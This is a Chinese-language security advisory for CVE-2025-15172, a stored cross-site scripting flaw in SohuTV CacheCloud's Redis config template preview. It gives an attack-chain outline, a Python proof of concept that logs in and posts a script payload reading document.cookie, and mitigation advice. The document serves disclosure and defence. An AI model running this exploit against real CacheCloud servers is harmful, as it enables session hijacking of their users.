CVE-2025-15172 SohuTV CacheCloud preview函数跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-15172

漏洞类型

XSS跨站脚本攻击

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

SohuTV CacheCloud

漏洞概述

CVE-2025-15172是搜狐TV开源的CacheCloud缓存管理平台中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于RedisConfigTemplateController.java文件的preview函数中，攻击者可以通过构造恶意脚本内容，在用户访问相关页面时执行任意JavaScript代码。由于该漏洞需要低权限用户交互才能触发，CVSS评分仅为3.5，但仍然存在安全风险。漏洞影响版本至3.2.0，官方尚未发布修复版本。攻击者可能利用此漏洞窃取用户会话、劫持账户或进行钓鱼攻击。

技术细节

该漏洞位于com.sohu.cache.web.controller.RedisConfigTemplateController.java文件的preview方法中。攻击者通过Redis配置模板功能提交包含恶意JavaScript代码的输入，该代码被存储在系统中。当其他用户访问preview功能查看配置模板时，恶意脚本会被浏览器解析执行。由于漏洞属于存储型XSS，恶意代码会持久化在服务器端，影响所有访问该页面的用户。攻击者可以利用此漏洞获取受害者的cookie信息、进行键盘记录或重定向用户到恶意网站。漏洞需要低权限认证用户配合用户交互才能触发，攻击复杂度较低。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标使用SohuTV CacheCloud版本<=3.2.0，确认RedisConfigTemplateController的preview接口存在

STEP 2

Authentication

攻击者获取低权限账户登录凭证，成功登录系统

STEP 3

Payload Injection

通过/redis/config/template/preview接口提交包含恶意JavaScript代码的Redis配置模板

STEP 4

Storage

恶意XSS payload被存储在服务器数据库中，等待其他用户访问

STEP 5

Trigger

受害者访问preview功能查看配置模板时，恶意脚本被浏览器解析执行

STEP 6

Impact

攻击者窃取受害者cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-15172 PoC - Stored XSS in SohuTV CacheCloud
# Target: SohuTV CacheCloud <= 3.2.0
# Endpoint: /redis/config/template/preview

TARGET_URL = "http://target-server:8080"
LOGIN_URL = f"{TARGET_URL}/login"
PREVIEW_URL = f"{TARGET_URL}/redis/config/template/preview"

# XSS Payload
XSS_PAYLOAD = "<script>alert(document.cookie)</script>"

def exploit():
    """
    Exploit stored XSS in RedisConfigTemplateController preview function
    """
    session = requests.Session()
    
    # Step 1: Login with low privilege account
    login_data = {
        "username": "attacker_user",
        "password": "password123"
    }
    session.post(LOGIN_URL, data=login_data)
    
    # Step 2: Submit malicious XSS payload via template preview
    exploit_data = {
        "templateName": "malicious-template",
        "templateContent": XSS_PAYLOAD,
        "templateType": "redis"
    }
    
    response = session.post(PREVIEW_URL, data=exploit_data)
    
    if response.status_code == 200:
        print("[+] XSS payload stored successfully")
        print("[*] Any user viewing this template will trigger the XSS")
    else:
        print("[-] Exploitation failed")

if __name__ == "__main__":
    exploit()

影响范围

SohuTV CacheCloud <= 3.2.0

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时措施：对所有用户输入进行严格的输入验证，禁止包含script标签和事件处理器属性；对输出到页面的内容进行HTML实体编码转义；配置严格的Content-Security-Policy响应头限制脚本来源；限制低权限用户对模板预览功能的访问权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15172
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15172
3 Details https://www.cvedetails.com/cve/CVE-2025-15172/
4 VulDB https://vuldb.com/cve/CVE-2025-15172
5 Link https://github.com/sohutv/cachecloud/issues/368
6 Link https://github.com/sohutv/cachecloud/issues/368#issue-3733556724
7 Link https://vuldb.com/?ctiid.338557
8 Link https://vuldb.com/?id.338557
9 Link https://vuldb.com/?submit.716306